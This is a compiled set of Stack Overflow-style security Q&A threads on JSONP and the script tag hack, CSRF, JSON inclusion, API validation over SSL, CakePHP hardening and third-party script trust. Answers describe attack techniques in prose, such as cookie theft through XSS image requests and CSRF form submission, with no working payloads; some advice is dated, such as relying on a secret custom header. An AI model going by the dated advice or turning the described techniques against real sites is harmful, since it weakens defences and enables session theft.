Safe implementation of script tag hack to do XSS? - security

Like a lot of developers, I want to make JavaScript served up by Server "A" talk to a web service on Server "B" but am stymied by the current incarnation of same origin policy. The most secure means of overcoming this (that I can find) is a server script that sits on Server "A" and acts as a proxy between it and "B". But if I want to deploy this JavaScript in a variety of customer environments (RoR, PHP, Python, .NET, etc. etc.) and can't write proxy scripts for all of them, what do I do?
Use JSONP, some people say. Well, Doug Crockford pointed out on his website and in interviews that the script tag hack (used by JSONP) is an unsafe way to get around the same origin policy. There's no way for the script being served by "A" to verify that "B" is who they say they are and that the data it returns isn't malicious or will capture sensitive user data on that page (e.g. credit card numbers) and transmit it to dastardly people. That seems like a reasonable concern, but what if I just use the script tag hack by itself and communicate strictly in JSON? Is that safe? If not, why not? Would it be any more safe with HTTPS? Example scenarios would be appreciated.
Addendum: Support for IE6 is required. Third-party browser extensions are not an option. Let's stick with addressing the merits and risks of the script tag hack, please.

Currently browser venders are split on how cross domain javascript should work. A secure and easy to use optoin is Flash's Crossdomain.xml file. Most languages have a Cross Domain Proxies written for them, and they are open source.
A more nefarious solution would be to use xss how the Sammy Worm used to spread. XSS can be used to "read" a remote domain using xmlhttprequest. XSS isn't required if the other domains have added a <script src="https://YOUR_DOMAIN"></script>. A script tag like this allows you to evaluate your own JavaScript in the context of another domain, which is identical to XSS.
It is also important to note that even with the restrictions on the same origin policy you can get the browser to transmit requests to any domain, you just can't read the response. This is the basis of CSRF. You could write invisible image tags to the page dynamically to get the browser to fire off an unlimited number of GET requests. This use of image tags is how an attacker obtains documnet.cookie using XSS on another domain. CSRF POST exploits work by building a form and then calling .submit() on the form object.
To understand the Same Orgin Policy, CSRF and XSS better you must read the Google Browser Security Handbook.

Take a look at easyXDM, it's a clean javascript library that allows you to communicate across the domain boundary without any server side interaction. It even supports RPC out of the box.
It supports all 'modern' browser, as well as IE6 with transit times < 15ms.
A common usecase is to use it to expose an ajax endpoint, allowing you to do cross-domain ajax with little effort (check out the small sample on the front page).

What if I just use the script tag hack by itself and communicate strictly in JSON? Is that safe? If not, why not?
Lets say you have two servers - frontend.com and backend.com. frontend.com includes a <script> tag like this - <script src="http://backend.com/code.js"></script>.
when the browser evaluates code.js is considered a part of frontend.com and NOT a part of backend.com. So, if code.js contained XHR code to communicate with backend.com, it would fail.
Would it be any more safe with HTTPS? Example scenarios would be appreciated.
If you just converted your <script src="https://backend.com/code.js> to https, it would NOT be any secure. If the rest of your page is http, then an attacker could easily man-in-the-middle the page and change that https to http - or worse, include his own javascript file.
If you convert the entire page and all its components to https, it would be more secure. But if you are paranoid enough to do that, you should also be paranoid NOT to depend on an external server for you data. If an attacker compromises backend.com, he has effectively got enough leverage on frontend.com, frontend2.com and all of your websites.
In short, https is helpful, but it won't help you one bit if your backend server gets compromised.
So, what are my options?
Add a proxy server on each of your client applications. You don't need to write any code, your webserver can automatically do that for you. If you are using Apache, look up mod_rewrite
If your users are using the latest browsers, you could consider using Cross Origin Resource Sharing.
As The Rook pointed out, you could also use Flash + Crossdomain. Or you could use Silverlight and its equivalent of Crossdomain. Both technologies allow you to communicate with javascript - so you just need to write a utility function and then normal js code would work. I believe YUI already provides a flash wrapper for this - check YUI3 IO
What do you recommend?
My recommendation is to create a proxy server, and use https throughout your website.

Apologies to all who attempted to answer my question. It proceeded under a false assumption about how the script tag hack works. The assumption was that one could simply append a script tag to the DOM and that the contents of that appended script tag would not be restricted by the same origin policy.
If I'd bothered to test my assumption before posting the question, I would've known that it's the source attribute of the appended tag that's unrestricted. JSONP takes this a step further by establishing a protocol that wraps traditional JSON web service responses in a callback function.
Regardless of how the script tag hack is used, however, there is no way to screen the response for malicious code since browsers execute whatever JavaScript is returned. And neither IE, Firefox nor Webkit browsers check SSL certificates in this scenario. Doug Crockford is, so far as I can tell, correct. There is no safe way to do cross domain scripting as of JavaScript 1.8.5.

Related

CSRF protection in browser extensions

I need to implement CSRF protection for my site. So I started implementing this for all forms from my site, but I have problems with implementation of it in browsers extensions (Chrome, Safari, Firefox). I have no ideas how to do this for posts from my extensions(forms and ajax posts). Had anyone implemented this ever?
Well, here are some things that I saw people actually use - in my function as addons.mozilla.org (code) reviewer:
Design a proper API. There are tons of resources on SO and the web, e.g. detailing how to properly build e.g. Restful APIs and secure them against CSRF. The thing to keep in mind is that extension APIs in contrast to regular web pages provide XHR that either doesn't care same-origin or let you define a set of locations the extension is allowed to access. Hence extension-specific APIs not need to implement CORS, which shrinks the attack surface on such APIs quite a bit. Of course, it would be better to go the extra-mile and ensure your API is secure even with CORS.
Designing a full web API can take quite a lot of time. I saw people build a very minimal one: The API consists of a single method to get the CSRF token to be used with the regular not-very-APIy existing forms.
If you cannot implement a proper API, because e.g. it's not your site/code or you simply lack the time, resources and/or skills to learn about and then design and implement an API, there is still another way: Just web-scrape the site (XHR + regex usually) and get the CSRF token that way. Again, extensions do not have to abide same-origin, so web-scraping is always a possibility, while web sites cannot do the same thing unless allowed by CORS.
Almost forgot: Some extensions are nothing more than a button that will open a regular webpage on the server - not necessarily in a regular tab, but often in some kind of panel as provided by the extension API you're dealing with.

Is CSRF protection for side effect free GET requests needed?

I'm developing a web application in which all dynamic content is retrieved as JSON with Ajax requests. I'm considering whether I should protect GET API calls from being invoked from different origins?
GET requests do not modify state and a common wisdom is that they do not require CSRF protection. But I wonder if there are no corner cases in which browser leaks the result of such requests to a different origin site?
For example, if a different origin site GETs /users/emails as script, css or img, is it possible that a browser would leak resulting json to the calling site (for example via javascript onerror handler)?
Do Browsers give strong enough guarantees that a content of a cross origin JSON response won't be leaked? Do you think protecting GET request against cross origin calls makes sense or is it overkill?
You have nailed a corner case and yet highly relevant issue. Indeed, there is this possibility, and it's called JSON Inclusion or Cross Site Scripting Inclusion or Javascript Inclusion, depending on who you refer to. The attack is, basically, doing a on an evil site, and then accessing the results via javascript once the js engine has parsed it.
The short story is that ALL your JSON responses have to be contained in an Object, not an Array or JSONP (so: {...}) and for better measure you should start all responses with a prefix (while(1), for(;;) or a parser breaker). Look at facebook's or google's JSON responses to have a live example.
Or, you can make your URLs unguessable by using a CSRF protection - both approach works.
No:
This is not a CSRF issue, as long as you're returning pure JSON and your GET's are side affect free, it DOES NOT have to be csrf protected.
what Paradoxengine mentioned is another vulnerabilty: if you are using JSONP it is possible for an attacker to read the JSON sent to an authenticated user. Users of very old browsers (IE 5.5) can also be attacked in this way even using regular JSON.
You can send requests to a different domain (which is what CSRF attacks do), but you can't read the responses.
I learn this in another stack overflow question from here It seems like I understand CSRF incorrectly?
hope this help you understand the question.

Security advice: SSL and API access

My API (a desktop application) communicates with my web app using basic HTTP authentication over SSL (Basically I'm just using https instead of http in the requests). My API has implemented logic that makes sure that users don't send incorrect information, but the problem I have is that someone could bypass the API and use curl to potentially post incorrect data (obtaining credentials is trivial since signing up on my web app is free).
I have thought about the following options:
Duplicate the API's logic in the web app so that even if users try to cheat the system using curl or some other tool they are presented with the same conditions.
Implement a further authentication check to make sure only my API can communicate with my web app. (Perhaps SSL client certificates?).
Encrypt the data (Base 64?)
I know I'm being a little paranoid about users spoofing my web app with curl-like tools but I'd rather be safe than sorry. Duplicating the logic is really painful and I would rather not do that. I don't know much about SSL client certificates, can I use them in conjunction with basic HTTP authentication? Will they make my requests take longer to process? What other options do I have?
Thanks in advance.
SSL protects you from the man-in-the-middle attacks, but not from attacks originated on the client side of the SSL. A client certificate built into your client API would allow you to identify that data was crafted by the client side API, but will not help you figuring out if client side manually modified the data just before it got encrypted. Technically ssavy user on the client end can always find a way to modify data by debugging through your client side API. The best you can do is to put roadblocks to your client side API, to make it harder to decipher it. Validation on the server side is indeed the way to go.
Consider refactoring your validation code so that it can be used on both sides.
You must validate the data on the server side. You can throw nasty errors back across the connection if the server-side validation fails — that's OK, they're not supposed to be tripped — but if you don't, you are totally vulnerable. (Think about it this way: it's the server's logic that you totally control, therefore it is the server's logic that has to make the definitive decisions about the validity of communications.)
Using client certificates won't really protect you much additionally from users who have permission to use the API in the first place; if nothing else, they can take apart the code to extract the client certificate (and it has to be readable to your client code to be usable at all). Nor will adding extra encryption; it makes things much more difficult for you (more things to go wrong) without adding much safety over that already provided by that SSL connection. (The scenario where adding encryption helps is when the messages sent over HTTPS have to go via untrusted proxies.)
Base-64 is not encryption. It's just a way of encoding bytes as easier-to-handle characters.
I would agree in general with sinelaw's comment that such validations are usually better on the server side to avoid exactly the kind of issue you're running into (supporting multiple client types). That said, you may just not be in a position to move the logic, in which case you need to do something.
To me, your options are:
Client-side certificates, as you suggest -- you're basically authenticating that the client is who (or what, in your case) you expect it to be. I have worked with these before and mutual authentication configuration can be confusing. I would not worry about the performance, as I think the first step is getting the behavior your want (correctness first). Anyway, in general, while this option is feasible, it can be exasperating to set up, depending on your web container.
Custom HTTP header in your desktop app, checking for its existence/value on the server side, or just leveraging of the existing User-Agent header. Since you're encrypting the traffic, one should not be able to easily see the HTTP header you're sending, so you can set its name and value to whatever you want. Checking for that on the server side is akin to assuring you that the client sending the request is almost certainly using your desktop app.
I would personally go the custom header route. It may not be 100% perfect, but if you're interested in doing the simplest possible thing to mitigate the most risk, it strikes me as the best route. It's not a great option if you don't use HTTPS (because then anyone can see the header if they flip on a sniffer), but given that you do use HTTPS, it should work fine.
BTW, I think you may be confusing a few things -- HTTPS is going to give you encryption, but it doesn't necessarily involve (client) authentication. Those are two different things, although they are often bundled together. I'm assuming you're using HTTPS with authentication of the actual user (basic auth or whatever).

Cakephp Security

I am new to Security of Web apps. I am developing an application in Cakephp and one of my friends told me about the Cross-site request forgery (CSRF) and cross-site scripting (XSS) attacks etc. not sure how many more are there.
I need some help in understanding how to make Cakephp defend my web app against these. we are low budget and we cant hire a security consulant as of now. We are still developing the app and plan to release in by the end of the month. so wanna take care of the initial stuff that can help me stand un hacked ;)
There is not (and cannot be) one tool you can deploy and then never have to think about security again. Deploying ‘anti-XSS’ hacks like CakePHP's Sanitize::clean will get in users' way by blocking valid input, whilst still not necessarily making the app secure. Input filtering hacks are at best an obfuscation measure, not a fix for security holes.
To have a secure web application, you must write a secure web application, from the ground up. That means, primarily, attention to detail when you are putting strings from one context into another. In particular:
any time you write a string to HTML text content or attribute value, HTML-escape it (htmlspecialchars()) to avoid HTML-injection leading to XSS. This isn't just a matter of user input that might contain attacks, it's the correct way to put plain text into HTML.
Where you are using HTML helper methods, they should take care of HTML-escaping of those elements by default (unless you turn off escape); it is very unfortunate that the CakePHP tutorial includes the bad practice of echoing unescaped strings into HTML for text outside of HTML helpers.
any time you create SQL queries with string values, SQL-escape it (with an appropriate function for your database such as mysql_real_escape_string).
If you are using CakePHP's ORM and not writing your own SQL you don't have to worry about this.
avoid using user input (eg file upload names) to name files on the filesystem (generate clean unique IDs instead) or as any part of a system() command.
include the Security component to add a form submission token scheme that will prevent XSRF on forms generated by CakePHP.
Cake can be secured relatively easy (compared to self written php scripts):
http://www.dereuromark.de/2010/10/05/cakephp-security/

"Same origin policy" and scripts loaded from google - a vulnerable solution?

I read the question here in SO "jQuery Linking vs. Download" and I somehow don't get it.
What happens if you host a page on http://yourserver.com, but load jQuery library from http://ajax.googleapis.com and then use the functions defined in jQuery script?
Does "same origin policy" not count in this case? I mean, can you make AJAX calls back to http://yourserver.com?
Is the JavaScript being executed considered as coming from yourserver.com?
My point here is, you do not know what the user has downloaded from some third party server (sorry, Google), and still the code executing on his computer is as good as the one he would download from your server?
EDIT: Does it mean _that if I use a web statistics counter from a 3rd party I don't know very well, they might "inject" some code and call into my web services as if their code was part of mine?
The owner of site http://yourserver.com/ should trust the content it references from other servers (in this case, Google's). The same origin policy doesn't apply to "script" tags.
Of course, the scripts of the foreign servers (once loaded) have access to the whole DOM: so, if the foreign content is compromised, there can be security exposures.
As with many things in the web world, it comes down to trust and continuous management.
Edit:
Does it mean _that if I use a web
statistics counter from a 3rd party I
don't know very well, they might
"inject" some code and call into my
web services as if their code was part
of mine?
Yes.
Answering the Edit comment: Yes. Unless the counter was wrapped in an iframe tag, it is as if it was a part of your web site and can call into your web services, access your cookies, etc.
Yes, the policy doesn't apply to <script> tags.
If someone was able to hack google's script store, it would affect every page served from every domain, that uses google.com as their host for scripts.

Resources